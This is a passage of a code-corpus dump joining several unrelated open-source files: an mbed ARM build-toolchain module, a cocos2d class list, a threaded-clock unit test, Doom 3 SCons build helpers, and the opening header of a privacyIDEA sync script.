You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import re
import sys
from os import stat, walk
from copy import copy
from time import time, sleep
from types import ListType
from shutil import copyfile
from os.path import join, splitext, exists, relpath, dirname, basename, split
from inspect import getmro
from multiprocessing import Pool, cpu_count
from workspace_tools.utils import run_cmd, mkdir, rel_path, ToolException, split_path
from workspace_tools.settings import BUILD_OPTIONS, MBED_ORG_USER
import workspace_tools.hooks as hooks
#Disables multiprocessing if set to higher number than the host machine CPUs
CPU_COUNT_MIN = 1
def print_notify(event, silent=False):
""" Default command line notification
"""
if event['type'] in ['info', 'debug']:
print event['message']
elif event['type'] == 'cc':
event['severity'] = event['severity'].title()
event['file'] = basename(event['file'])
print '[%(severity)s] %(file)s@%(line)s: %(message)s' % event
elif event['type'] == 'progress':
if not silent:
print '%s: %s' % (event['action'].title(), basename(event['file']))
def print_notify_verbose(event, silent=False):
""" Default command line notification with more verbose mode
"""
if event['type'] in ['info', 'debug']:
print_notify(event) # standard handle
elif event['type'] == 'cc':
event['severity'] = event['severity'].title()
event['file'] = basename(event['file'])
event['mcu_name'] = "None"
event['toolchain'] = "None"
event['target_name'] = event['target_name'].upper() if event['target_name'] else "Unknown"
event['toolchain_name'] = event['toolchain_name'].upper() if event['toolchain_name'] else "Unknown"
print '[%(severity)s] %(target_name)s::%(toolchain_name)s::%(file)s@%(line)s: %(message)s' % event
elif event['type'] == 'progress':
print_notify(event) # standard handle
def compile_worker(job):
results = []
for command in job['commands']:
_, _stderr, _rc = run_cmd(command, job['work_dir'])
results.append({
'code': _rc,
'output': _stderr,
'command': command
})
return {
'source': job['source'],
'object': job['object'],
'commands': job['commands'],
'results': results
}
class Resources:
def __init__(self, base_path=None):
self.base_path = base_path
self.inc_dirs = []
self.headers = []
self.s_sources = []
self.c_sources = []
self.cpp_sources = []
self.lib_dirs = set([])
self.objects = []
self.libraries = []
# mbed special files
self.lib_builds = []
self.lib_refs = []
self.repo_dirs = []
self.repo_files = []
self.linker_script = None
# Other files
self.hex_files = []
self.bin_files = []
def add(self, resources):
self.inc_dirs += resources.inc_dirs
self.headers += resources.headers
self.s_sources += resources.s_sources
self.c_sources += resources.c_sources
self.cpp_sources += resources.cpp_sources
self.lib_dirs |= resources.lib_dirs
self.objects += resources.objects
self.libraries += resources.libraries
self.lib_builds += resources.lib_builds
self.lib_refs += resources.lib_refs
self.repo_dirs += resources.repo_dirs
self.repo_files += resources.repo_files
if resources.linker_script is not None:
self.linker_script = resources.linker_script
self.hex_files += resources.hex_files
self.bin_files += resources.bin_files
def relative_to(self, base, dot=False):
for field in ['inc_dirs', 'headers', 's_sources', 'c_sources',
'cpp_sources', 'lib_dirs', 'objects', 'libraries',
'lib_builds', 'lib_refs', 'repo_dirs', 'repo_files', 'hex_files', 'bin_files']:
v = [rel_path(f, base, dot) for f in getattr(self, field)]
setattr(self, field, v)
if self.linker_script is not None:
self.linker_script = rel_path(self.linker_script, base, dot)
def win_to_unix(self):
for field in ['inc_dirs', 'headers', 's_sources', 'c_sources',
'cpp_sources', 'lib_dirs', 'objects', 'libraries',
'lib_builds', 'lib_refs', 'repo_dirs', 'repo_files', 'hex_files', 'bin_files']:
v = [f.replace('\\', '/') for f in getattr(self, field)]
setattr(self, field, v)
if self.linker_script is not None:
self.linker_script = self.linker_script.replace('\\', '/')
def __str__(self):
s = []
for (label, resources) in (
('Include Directories', self.inc_dirs),
('Headers', self.headers),
('Assembly sources', self.s_sources),
('C sources', self.c_sources),
('C++ sources', self.cpp_sources),
('Library directories', self.lib_dirs),
('Objects', self.objects),
('Libraries', self.libraries),
('Hex files', self.hex_files),
('Bin files', self.bin_files),
):
if resources:
s.append('%s:\n ' % label + '\n '.join(resources))
if self.linker_script:
s.append('Linker Script: ' + self.linker_script)
return '\n'.join(s)
# Support legacy build conventions: the original mbed build system did not have
# standard labels for the "TARGET_" and "TOOLCHAIN_" specific directories, but
# had the knowledge of a list of these directories to be ignored.
LEGACY_IGNORE_DIRS = set([
'LPC11U24', 'LPC1768', 'LPC2368', 'LPC4088', 'LPC812', 'KL25Z',
'ARM', 'GCC_ARM', 'GCC_CR', 'GCC_CS', 'IAR', 'uARM'
])
LEGACY_TOOLCHAIN_NAMES = {
'ARM_STD':'ARM', 'ARM_MICRO': 'uARM',
'GCC_ARM': 'GCC_ARM', 'GCC_CR': 'GCC_CR', 'GCC_CS': 'GCC_CS',
'IAR': 'IAR',
}
class mbedToolchain:
VERBOSE = True
CORTEX_SYMBOLS = {
"Cortex-M0" : ["__CORTEX_M0", "ARM_MATH_CM0"],
"Cortex-M0+": ["__CORTEX_M0PLUS", "ARM_MATH_CM0PLUS"],
"Cortex-M1" : ["__CORTEX_M3", "ARM_MATH_CM1"],
"Cortex-M3" : ["__CORTEX_M3", "ARM_MATH_CM3"],
"Cortex-M4" : ["__CORTEX_M4", "ARM_MATH_CM4"],
"Cortex-M4F" : ["__CORTEX_M4", "ARM_MATH_CM4", "__FPU_PRESENT=1"],
"Cortex-M7" : ["__CORTEX_M7", "ARM_MATH_CM7"],
"Cortex-M7F" : ["__CORTEX_M7", "ARM_MATH_CM7", "__FPU_PRESENT=1"],
"Cortex-A9" : ["__CORTEX_A9", "ARM_MATH_CA9", "__FPU_PRESENT", "__CMSIS_RTOS", "__EVAL", "__MBED_CMSIS_RTOS_CA9"],
}
GOANNA_FORMAT = "[Goanna] warning [%FILENAME%:%LINENO%] - [%CHECKNAME%(%SEVERITY%)] %MESSAGE%"
GOANNA_DIAGNOSTIC_PATTERN = re.compile(r'"\[Goanna\] (?P<severity>warning) \[(?P<file>[^:]+):(?P<line>\d+)\] \- (?P<message>.*)"')
def __init__(self, target, options=None, notify=None, macros=None, silent=False):
self.target = target
self.name = self.__class__.__name__
self.hook = hooks.Hook(target, self)
self.silent = silent
self.legacy_ignore_dirs = LEGACY_IGNORE_DIRS - set([target.name, LEGACY_TOOLCHAIN_NAMES[self.name]])
self.notify_fun = notify if notify is not None else print_notify
self.options = options if options is not None else []
self.macros = macros or []
self.options.extend(BUILD_OPTIONS)
if self.options:
self.info("Build Options: %s" % (', '.join(self.options)))
self.obj_path = join("TARGET_"+target.name, "TOOLCHAIN_"+self.name)
self.symbols = None
self.labels = None
self.has_config = False
self.build_all = False
self.timestamp = time()
self.jobs = 1
self.CHROOT = None
self.mp_pool = None
def notify(self, event):
""" Little closure for notify functions
"""
return self.notify_fun(event, self.silent)
def __exit__(self):
if self.mp_pool is not None:
self.mp_pool.terminate()
def goanna_parse_line(self, line):
if "analyze" in self.options:
return self.GOANNA_DIAGNOSTIC_PATTERN.match(line)
else:
return None
def get_symbols(self):
if self.symbols is None:
# Target and Toolchain symbols
labels = self.get_labels()
self.symbols = ["TARGET_%s" % t for t in labels['TARGET']]
self.symbols.extend(["TOOLCHAIN_%s" % t for t in labels['TOOLCHAIN']])
# Config support
if self.has_config:
self.symbols.append('HAVE_MBED_CONFIG_H')
# Cortex CPU symbols
if self.target.core in mbedToolchain.CORTEX_SYMBOLS:
self.symbols.extend(mbedToolchain.CORTEX_SYMBOLS[self.target.core])
# Symbols defined by the on-line build.system
self.symbols.extend(['MBED_BUILD_TIMESTAMP=%s' % self.timestamp, '__MBED__=1'])
if MBED_ORG_USER:
self.symbols.append('MBED_USERNAME=' + MBED_ORG_USER)
# Add target's symbols
self.symbols += self.target.macros
# Add extra symbols passed via 'macros' parameter
self.symbols += self.macros
# Form factor variables
if hasattr(self.target, 'supported_form_factors'):
self.symbols.extend(["TARGET_FF_%s" % t for t in self.target.supported_form_factors])
return self.symbols
def get_labels(self):
if self.labels is None:
toolchain_labels = [c.__name__ for c in getmro(self.__class__)]
toolchain_labels.remove('mbedToolchain')
self.labels = {
'TARGET': self.target.get_labels(),
'TOOLCHAIN': toolchain_labels
}
return self.labels
def need_update(self, target, dependencies):
if self.build_all:
return True
if not exists(target):
return True
target_mod_time = stat(target).st_mtime
for d in dependencies:
# Some objects are not provided with full path and here we do not have
# information about the library paths. Safe option: assume an update
if not d or not exists(d):
return True
if stat(d).st_mtime >= target_mod_time:
return True
return False
def scan_resources(self, path):
labels = self.get_labels()
resources = Resources(path)
self.has_config = False
""" os.walk(top[, topdown=True[, onerror=None[, followlinks=False]]])
When topdown is True, the caller can modify the dirnames list in-place
(perhaps using del or slice assignment), and walk() will only recurse into
the subdirectories whose names remain in dirnames; this can be used to prune
the search, impose a specific order of visiting, or even to inform walk()
about directories the caller creates or renames before it resumes walk()
again. Modifying dirnames when topdown is False is ineffective, because in
bottom-up mode the directories in dirnames are generated before dirpath
itself is generated.
"""
for root, dirs, files in walk(path):
# Remove ignored directories
for d in copy(dirs):
if d == '.hg':
dir_path = join(root, d)
resources.repo_dirs.append(dir_path)
resources.repo_files.extend(self.scan_repository(dir_path))
if ((d.startswith('.') or d in self.legacy_ignore_dirs) or
(d.startswith('TARGET_') and d[7:] not in labels['TARGET']) or
(d.startswith('TOOLCHAIN_') and d[10:] not in labels['TOOLCHAIN'])):
dirs.remove(d)
# Add root to include paths
resources.inc_dirs.append(root)
for file in files:
file_path = join(root, file)
_, ext = splitext(file)
ext = ext.lower()
if ext == '.s':
resources.s_sources.append(file_path)
elif ext == '.c':
resources.c_sources.append(file_path)
elif ext == '.cpp':
resources.cpp_sources.append(file_path)
elif ext == '.h' or ext == '.hpp':
if basename(file_path) == "mbed_config.h":
self.has_config = True
resources.headers.append(file_path)
elif ext == '.o':
resources.objects.append(file_path)
elif ext == self.LIBRARY_EXT:
resources.libraries.append(file_path)
resources.lib_dirs.add(root)
elif ext == self.LINKER_EXT:
if resources.linker_script is not None:
self.info("Warning: Multiple linker scripts detected: %s -> %s" % (resources.linker_script, file_path))
resources.linker_script = file_path
elif ext == '.lib':
resources.lib_refs.append(file_path)
elif ext == '.bld':
resources.lib_builds.append(file_path)
elif file == '.hgignore':
resources.repo_files.append(file_path)
elif ext == '.hex':
resources.hex_files.append(file_path)
elif ext == '.bin':
resources.bin_files.append(file_path)
return resources
def scan_repository(self, path):
resources = []
for root, dirs, files in walk(path):
# Remove ignored directories
for d in copy(dirs):
if d == '.' or d == '..':
dirs.remove(d)
for file in files:
file_path = join(root, file)
resources.append(file_path)
return resources
def copy_files(self, files_paths, trg_path, rel_path=None):
# Handle a single file
if type(files_paths) != ListType: files_paths = [files_paths]
for source in files_paths:
if source is None:
files_paths.remove(source)
for source in files_paths:
if rel_path is not None:
relative_path = relpath(source, rel_path)
else:
_, relative_path = split(source)
target = join(trg_path, relative_path)
if (target != source) and (self.need_update(target, [source])):
self.progress("copy", relative_path)
mkdir(dirname(target))
copyfile(source, target)
def relative_object_path(self, build_path, base_dir, source):
source_dir, name, _ = split_path(source)
obj_dir = join(build_path, relpath(source_dir, base_dir))
mkdir(obj_dir)
return join(obj_dir, name + '.o')
def compile_sources(self, resources, build_path, inc_dirs=None):
# Web IDE progress bar for project build
files_to_compile = resources.s_sources + resources.c_sources + resources.cpp_sources
self.to_be_compiled = len(files_to_compile)
self.compiled = 0
#for i in self.build_params:
# self.debug(i)
# self.debug("%s" % self.build_params[i])
inc_paths = resources.inc_dirs
if inc_dirs is not None:
inc_paths.extend(inc_dirs)
objects = []
queue = []
prev_dir = None
# The dependency checking for C/C++ is delegated to the compiler
base_path = resources.base_path
files_to_compile.sort()
for source in files_to_compile:
_, name, _ = split_path(source)
object = self.relative_object_path(build_path, base_path, source)
# Avoid multiple mkdir() calls on same work directory
work_dir = dirname(object)
if work_dir is not prev_dir:
prev_dir = work_dir
mkdir(work_dir)
# Queue mode (multiprocessing)
commands = self.compile_command(source, object, inc_paths)
if commands is not None:
queue.append({
'source': source,
'object': object,
'commands': commands,
'work_dir': work_dir,
'chroot': self.CHROOT
})
else:
objects.append(object)
# Use queues/multiprocessing if cpu count is higher than setting
jobs = self.jobs if self.jobs else cpu_count()
if jobs > CPU_COUNT_MIN and len(queue) > jobs:
return self.compile_queue(queue, objects)
else:
return self.compile_seq(queue, objects)
def compile_seq(self, queue, objects):
for item in queue:
result = compile_worker(item)
self.compiled += 1
self.progress("compile", item['source'], build_update=True)
for res in result['results']:
self.debug("Command: %s" % ' '.join(res['command']))
self.compile_output([
res['code'],
res['output'],
res['command']
])
objects.append(result['object'])
return objects
def compile_queue(self, queue, objects):
jobs_count = int(self.jobs if self.jobs else cpu_count())
p = Pool(processes=jobs_count)
results = []
for i in range(len(queue)):
results.append(p.apply_async(compile_worker, [queue[i]]))
itr = 0
while True:
itr += 1
if itr > 30000:
p.terminate()
p.join()
raise ToolException("Compile did not finish in 5 minutes")
pending = 0
for r in results:
if r._ready is True:
try:
result = r.get()
results.remove(r)
self.compiled += 1
self.progress("compile", result['source'], build_update=True)
for res in result['results']:
self.debug("Command: %s" % ' '.join(res['command']))
self.compile_output([
res['code'],
res['output'],
res['command']
])
objects.append(result['object'])
except ToolException, err:
p.terminate()
p.join()
raise ToolException(err)
else:
pending += 1
if pending > jobs_count:
break
if len(results) == 0:
break
sleep(0.01)
results = None
p.terminate()
p.join()
return objects
def compile_command(self, source, object, includes):
# Check dependencies
_, ext = splitext(source)
ext = ext.lower()
if ext == '.c' or ext == '.cpp':
base, _ = splitext(object)
dep_path = base + '.d'
deps = self.parse_dependencies(dep_path) if (exists(dep_path)) else []
if len(deps) == 0 or self.need_update(object, deps):
if ext == '.c':
return self.compile_c(source, object, includes)
else:
return self.compile_cpp(source, object, includes)
elif ext == '.s':
deps = [source]
if self.need_update(object, deps):
return self.assemble(source, object, includes)
else:
return False
return None
def compile_output(self, output=[]):
_rc = output[0]
_stderr = output[1]
command = output[2]
# Parse output for Warnings and Errors
self.parse_output(_stderr)
self.debug("Return: %s"% _rc)
for error_line in _stderr.splitlines():
self.debug("Output: %s"% error_line)
# Check return code
if _rc != 0:
for line in _stderr.splitlines():
self.tool_error(line)
raise ToolException(_stderr)
def compile(self, cc, source, object, includes):
_, ext = splitext(source)
ext = ext.lower()
command = cc + ['-D%s' % s for s in self.get_symbols()] + ["-I%s" % i for i in includes] + ["-o", object, source]
if hasattr(self, "get_dep_opt"):
base, _ = splitext(object)
dep_path = base + '.d'
command.extend(self.get_dep_opt(dep_path))
if hasattr(self, "cc_extra"):
command.extend(self.cc_extra(base))
return [command]
def compile_c(self, source, object, includes):
return self.compile(self.cc, source, object, includes)
def compile_cpp(self, source, object, includes):
return self.compile(self.cppc, source, object, includes)
def build_library(self, objects, dir, name):
lib = self.STD_LIB_NAME % name
fout = join(dir, lib)
if self.need_update(fout, objects):
self.info("Library: %s" % lib)
self.archive(objects, fout)
def link_program(self, r, tmp_path, name):
ext = 'bin'
if hasattr(self.target, 'OUTPUT_EXT'):
ext = self.target.OUTPUT_EXT
if hasattr(self.target, 'OUTPUT_NAMING'):
self.var("binary_naming", self.target.OUTPUT_NAMING)
if self.target.OUTPUT_NAMING == "8.3":
name = name[0:8]
ext = ext[0:3]
filename = name+'.'+ext
elf = join(tmp_path, name + '.elf')
bin = join(tmp_path, filename)
if self.need_update(elf, r.objects + r.libraries + [r.linker_script]):
self.progress("link", name)
self.link(elf, r.objects, r.libraries, r.lib_dirs, r.linker_script)
if self.need_update(bin, [elf]):
self.progress("elf2bin", name)
self.binary(r, elf, bin)
self.var("compile_succeded", True)
self.var("binary", filename)
return bin
def default_cmd(self, command):
_stdout, _stderr, _rc = run_cmd(command)
# Print all warning / erros from stderr to console output
for error_line in _stderr.splitlines():
print error_line
self.debug("Command: %s"% ' '.join(command))
self.debug("Return: %s"% _rc)
for output_line in _stdout.splitlines():
self.debug("Output: %s"% output_line)
for error_line in _stderr.splitlines():
self.debug("Errors: %s"% error_line)
if _rc != 0:
for line in _stderr.splitlines():
self.tool_error(line)
raise ToolException(_stderr)
### NOTIFICATIONS ###
def info(self, message):
self.notify({'type': 'info', 'message': message})
def debug(self, message):
if self.VERBOSE:
if type(message) is ListType:
message = ' '.join(message)
message = "[DEBUG] " + message
self.notify({'type': 'debug', 'message': message})
def cc_info(self, severity, file, line, message, target_name=None, toolchain_name=None):
self.notify({'type': 'cc',
'severity': severity,
'file': file,
'line': line,
'message': message,
'target_name': target_name,
'toolchain_name': toolchain_name})
def progress(self, action, file, build_update=False):
msg = {'type': 'progress', 'action': action, 'file': file}
if build_update:
msg['percent'] = 100. * float(self.compiled) / float(self.to_be_compiled)
self.notify(msg)
def tool_error(self, message):
self.notify({'type': 'tool_error', 'message': message})
def var(self, key, value):
self.notify({'type': 'var', 'key': key, 'val': value})
from workspace_tools.settings import ARM_BIN
from workspace_tools.settings import GCC_ARM_PATH, GCC_CR_PATH, GCC_CS_PATH, CW_EWL_PATH, CW_GCC_PATH
from workspace_tools.settings import IAR_PATH
TOOLCHAIN_BIN_PATH = {
'ARM': ARM_BIN,
'uARM': ARM_BIN,
'GCC_ARM': GCC_ARM_PATH,
'GCC_CS': GCC_CS_PATH,
'GCC_CR': GCC_CR_PATH,
'GCC_CW_EWL': CW_EWL_PATH,
'GCC_CW_NEWLIB': CW_GCC_PATH,
'IAR': IAR_PATH
}
from workspace_tools.toolchains.arm import ARM_STD, ARM_MICRO
from workspace_tools.toolchains.gcc import GCC_ARM, GCC_CS, GCC_CR
from workspace_tools.toolchains.gcc import GCC_CW_EWL, GCC_CW_NEWLIB
from workspace_tools.toolchains.iar import IAR
TOOLCHAIN_CLASSES = {
'ARM': ARM_STD,
'uARM': ARM_MICRO,
'GCC_ARM': GCC_ARM,
'GCC_CS': GCC_CS,
'GCC_CR': GCC_CR,
'GCC_CW_EWL': GCC_CW_EWL,
'GCC_CW_NEWLIB': GCC_CW_NEWLIB,
'IAR': IAR
}
TOOLCHAINS = set(TOOLCHAIN_CLASSES.keys())
| apache-2.0 |
DNESS/cocos2d-objc | tools/compatibility_with_0_8/classes_0_8.py | 50 | 4022 | classes = { "AccelAmplitude" : "", "AccelDeccelAmplitude" : "", "Action" : "", "ActionManager" : "", "Animate" : "", "Animation" : "", "AtlasAnimation" : "", "AtlasNode" : "", "AtlasSprite" : "", "AtlasSpriteFrame" : "", "AtlasSpriteManager" : "", "BezierBy" : "", "BezierTo" : "", "BitmapFontAtlas" : "", "BitmapFontConfiguration" : "", "Blink" : "", "CallFunc" : "", "CallFuncN" : "", "CallFuncND" : "", "Camera" : "", "CameraAction" : "", "CocosNode" : "", "ColorLayer" : "", "DeccelAmplitude" : "", "DelayTime" : "", "Director" : "", "DisplayLinkDirector" : "", "EAGLView" : "", "EaseAction" : "", "EaseBackIn" : "", "EaseBackInOut" : "", "EaseBackOut" : "", "EaseBounce" : "", "EaseBounceIn" : "", "EaseBounceInOut" : "", "EaseBounceOut" : "", "EaseElastic" : "", "EaseElasticIn" : "", "EaseElasticInOut" : "", "EaseElasticOut" : "", "EaseExponentialIn" : "", "EaseExponentialInOut" : "", "EaseExponentialOut" : "", "EaseIn" : "", "EaseInOut" : "", "EaseOut" : "", "EaseRateAction" : "", "EaseSineIn" : "", "EaseSineInOut" : "", "EaseSineOut" : "", "FadeBLTransition" : "", "FadeDownTransition" : "", "FadeIn" : "", "FadeOut" : "", "FadeOutBLTiles" : "", "FadeOutDownTiles" : "", "FadeOutTRTiles" : "", "FadeOutUpTiles" : "", "FadeTRTransition" : "", "FadeTo" : "", "FadeTransition" : "", "FadeUpTransition" : "", "FastDirector" : "", "FileUtils" : "", "FiniteTimeAction" : "", "FlipAngularTransition" : "", "FlipX3D" : "", "FlipXTransition" : "", "FlipY3D" : "", "FlipYTransition" : "", "Grabber" : "", "Grid3D" : "", "Grid3DAction" : "", "GridAction" : "", "GridBase" : "", "Hide" : "", "InstantAction" : "", "IntervalAction" : "", "JumpBy" : "", "JumpTiles3D" : "", "JumpTo" : "", "JumpZoomTransition" : "", "Label" : "", "LabelAtlas" : "", "Layer" : "", "Lens3D" : "", "Liquid" : "", "Menu" : "", "MenuItem" : "", "MenuItemAtlasFont" : "", "MenuItemAtlasSprite" : "", "MenuItemFont" : "", "MenuItemImage" : "", "MenuItemLabel" : "", "MenuItemSprite" : "", "MenuItemToggle" : "", "MotionStreak" : "", "MoveBy" : "", "MoveInBTransition" : "", "MoveInLTransition" : "", "MoveInRTransition" : "", "MoveInTTransition" : "", "MoveTo" : "", "MultiplexLayer" : "", "OrbitCamera" : "", "OrientedTransitionScene" : "", "PVRTexture" : "", "PageTurn3D" : "", "PageTurnTransition" : "", "ParallaxNode" : "", "ParticleExplosion" : "", "ParticleFire" : "", "ParticleFireworks" : "", "ParticleFlower" : "", "ParticleGalaxy" : "", "ParticleMeteor" : "", "ParticleRain" : "", "ParticleSmoke" : "", "ParticleSnow" : "", "ParticleSpiral" : "", "ParticleSun" : "", "ParticleSystem" : "", "Place" : "", "PointParticleSystem" : "", "QuadParticleSystem" : "", "RenderTexture" : "", "Repeat" : "", "RepeatForever" : "", "ReuseGrid" : "", "ReverseTime" : "", "Ribbon" : "", "RibbonSegment" : "", "Ripple3D" : "", "RotateBy" : "", "RotateTo" : "", "RotoZoomTransition" : "", "ScaleBy" : "", "ScaleTo" : "", "Scene" : "", "Scheduler" : "", "Sequence" : "", "Shaky3D" : "", "ShakyTiles3D" : "", "ShatteredTiles3D" : "", "Show" : "", "ShrinkGrowTransition" : "", "ShuffleTiles" : "", "SlideInBTransition" : "", "SlideInLTransition" : "", "SlideInRTransition" : "", "SlideInTTransition" : "", "Spawn" : "", "Speed" : "", "SplitCols" : "", "SplitColsTransition" : "", "SplitRows" : "", "SplitRowsTransition" : "", "Sprite" : "", "StandardTouchHandler" : "", "StopGrid" : "", "TMXLayer" : "", "TMXLayerInfo" : "", "TMXMapInfo" : "", "TMXTiledMap" : "", "TMXTilesetInfo" : "", "TargetedTouchHandler" : "", "Texture2D" : "", "TextureAtlas" : "", "TextureMgr" : "", "TextureNode" : "", "ThreadedFastDirector" : "", "TileMapAtlas" : "", "TiledGrid3D" : "", "TiledGrid3DAction" : "", "Timer" : "", "TimerDirector" : "", "TintBy" : "", "TintTo" : "", "ToggleVisibility" : "", "TouchDispatcher" : "", "TouchHandler" : "", "TransitionScene" : "", "TurnOffTiles" : "", "TurnOffTilesTransition" : "", "Twirl" : "", "Waves" : "", "Waves3D" : "", "WavesTiles3D" : "", "ZoomFlipAngularTransition" : "", "ZoomFlipXTransition" : "", "ZoomFlipYTransition" : "",} | mit |
atollena/commons | tests/python/twitter/common/testing/test_clock.py | 13 | 2792 | # ==================================================================================================
# Copyright 2015 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
import threading
from twitter.common.testing.clock import ThreadedClock
import pytest
@pytest.mark.parametrize('num_threads', (1, 10))
def test_with_events(num_threads):
event = threading.Event()
hits = []
hits_before, hits_after = 0, 0
clock = ThreadedClock(0)
def hit_me():
clock.sleep(0.1)
hits.append(True)
threads = []
for _ in range(num_threads):
th = threading.Thread(target=hit_me)
th.daemon = True
th.start()
threads.append(th)
clock.converge(threads=threads)
for th in threads:
clock.assert_waiting(th, 0.1)
clock.tick(0.05)
clock.converge(threads=threads)
hits_before += len(hits)
with pytest.raises(AssertionError):
clock.assert_waiting(threads[0], 234)
clock.tick(0.05)
clock.converge(threads=threads)
hits_after += len(hits)
for th in threads:
clock.assert_not_waiting(th)
with pytest.raises(AssertionError):
clock.assert_waiting(th, 0.1)
assert hits_before == 0
assert hits_after == num_threads
def test_not_converged():
clock1 = ThreadedClock(0)
clock2 = ThreadedClock(0)
def run():
clock1.sleep(1)
clock2.sleep(1)
th = threading.Thread(target=run)
th.daemon = True
th.start()
assert clock1.converge(threads=[th])
clock1.assert_waiting(th, 1)
assert clock2.converge(threads=[th], timeout=0.1) is False
clock2.assert_not_waiting(th)
clock1.tick(1)
clock2.tick(2)
clock1.converge(threads=[th])
clock2.converge(threads=[th])
clock1.assert_not_waiting(th)
clock2.assert_not_waiting(th)
def test_sleep_0():
clock = ThreadedClock(0)
event = threading.Event()
def run():
clock.sleep(0)
event.set()
th = threading.Thread(target=run)
th.daemon = True
th.start()
assert clock.converge(threads=[th])
assert event.is_set()
def test_sleep_negative():
with pytest.raises(IOError):
ThreadedClock(0).sleep(-1)
| apache-2.0 |
AreaScout/dante-doom3-odroid | neo/sys/scons/scons_utils.py | 2 | 5123 | # -*- mode: python -*-
import sys, os, string, time, commands, re, pickle, StringIO, popen2, commands, pdb, zipfile, tempfile
import SCons
# system detection -------------------------------
# CPU type
cpu = commands.getoutput('uname -m')
exp = re.compile('i?86')
if exp.match(cpu):
cpu = 'x86'
else:
if (commands.getoutput('uname -p') == 'powerpc'):
cpu = 'ppc'
g_os = 'Linux'
# end system detection ---------------------------
# need an Environment and a matching buffered_spawn API .. encapsulate
class idBuffering:
silent = False
def buffered_spawn( self, sh, escape, cmd, args, env ):
stderr = StringIO.StringIO()
stdout = StringIO.StringIO()
command_string = ''
for i in args:
if ( len( command_string ) ):
command_string += ' '
command_string += i
try:
retval = self.env['PSPAWN']( sh, escape, cmd, args, env, stdout, stderr )
except OSError, x:
if x.errno != 10:
raise x
print 'OSError ignored on command: %s' % command_string
retval = 0
print command_string
if ( retval != 0 or not self.silent ):
sys.stdout.write( stdout.getvalue() )
sys.stderr.write( stderr.getvalue() )
return retval
class idSetupBase:
def SimpleCommand( self, cmd ):
print cmd
ret = commands.getstatusoutput( cmd )
if ( len( ret[ 1 ] ) ):
sys.stdout.write( ret[ 1 ] )
sys.stdout.write( '\n' )
if ( ret[ 0 ] != 0 ):
raise 'command failed'
return ret[ 1 ]
def TrySimpleCommand( self, cmd ):
print cmd
ret = commands.getstatusoutput( cmd )
sys.stdout.write( ret[ 1 ] )
def M4Processing( self, file, d ):
file_out = file[:-3]
cmd = 'm4 '
for ( key, val ) in d.items():
cmd += '--define=%s="%s" ' % ( key, val )
cmd += '%s > %s' % ( file, file_out )
self.SimpleCommand( cmd )
def ExtractProtocolVersion( self ):
f = open( 'framework/Licensee.h' )
l = f.readlines()
f.close()
major = 'X'
p = re.compile( '^#define ASYNC_PROTOCOL_MAJOR\t*(.*)' )
for i in l:
if ( p.match( i ) ):
major = p.match( i ).group(1)
break
f = open( 'framework/async/AsyncNetwork.h' )
l = f.readlines()
f.close()
minor = 'X'
p = re.compile( '^const int ASYNC_PROTOCOL_MINOR\t*= (.*);' )
for i in l:
if ( p.match( i ) ):
minor = p.match( i ).group(1)
break
return '%s.%s' % ( major, minor )
def ExtractEngineVersion( self ):
f = open( 'framework/Licensee.h' )
l = f.readlines()
f.close()
version = 'X'
p = re.compile( '^#define.*ENGINE_VERSION\t*"DOOM (.*)"' )
for i in l:
if ( p.match( i ) ):
version = p.match( i ).group(1)
break
return version
def ExtractBuildVersion( self ):
f = open( 'framework/BuildVersion.h' )
l = f.readlines()[ 4 ]
f.close()
pat = re.compile( '.* = (.*);\n' )
return pat.split( l )[ 1 ]
def checkLDD( target, source, env ):
file = target[0]
if (not os.path.isfile(file.abspath)):
print('ERROR: CheckLDD: target %s not found\n' % target[0])
Exit(1)
( status, output ) = commands.getstatusoutput( 'ldd -r %s' % file )
# if ( status != 0 ):
# print 'ERROR: ldd command returned with exit code %d' % status
# os.system( 'rm %s' % target[ 0 ] )
# sys.exit(1)
lines = string.split( output, '\n' )
have_undef = 0
for i_line in lines:
#print repr(i_line)
regex = re.compile('undefined symbol: (.*)\t\\((.*)\\)')
if ( regex.match(i_line) ):
symbol = regex.sub('\\1', i_line)
try:
env['ALLOWED_SYMBOLS'].index(symbol)
except:
have_undef = 1
if ( have_undef ):
print output
print "ERROR: undefined symbols"
os.system('rm %s' % target[0])
sys.exit(1)
def SharedLibrarySafe( env, target, source ):
ret = env.SharedLibrary( target, source )
env.AddPostAction( ret, checkLDD )
return ret
def NotImplementedStub( *whatever ):
print 'Not Implemented'
sys.exit( 1 )
# --------------------------------------------------------------------
class idGamePaks( idSetupBase ):
def BuildGamePak( self, target = None, source = None, env = None ):
# NOTE: ew should have done with zipfile module
temp_dir = tempfile.mkdtemp( prefix = 'gamepak' )
self.SimpleCommand( 'cp %s %s' % ( source[0].abspath, os.path.join( temp_dir, 'game%s.so' % ( cpu ) ) ) )
#self.SimpleCommand( 'strip %s' % os.path.join( temp_dir, 'game%s.so' % ( cpu ) ) )
self.SimpleCommand( 'echo 2 > %s' % ( os.path.join( temp_dir, 'binary.conf' ) ) )
self.SimpleCommand( 'cd %s ; zip %s game%s.so binary.conf' % ( temp_dir, os.path.join( temp_dir, target[0].abspath ), cpu ) )
self.SimpleCommand( 'rm -r %s' % temp_dir )
return None
# --------------------------------------------------------------------
# get a clean error output when running multiple jobs
def SetupBufferedOutput( env, silent ):
buf = idBuffering()
buf.silent = silent
buf.env = env
env['SPAWN'] = buf.buffered_spawn
# setup utilities on an environement
def SetupUtils( env ):
gamepaks = idGamePaks()
env.BuildGamePak = gamepaks.BuildGamePak
env.SharedLibrarySafe = SharedLibrarySafe
def BuildList( s_prefix, s_string ):
s_list = string.split( s_string )
for i in range( len( s_list ) ):
s_list[ i ] = s_prefix + '/' + s_list[ i ]
return s_list
| gpl-3.0 |
privacyidea/privacyidea | tools/privacyidea-sync-owncloud.py | 1 | 8313 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# 2020-04-28 Cornelius Kölbel <[email protected]>
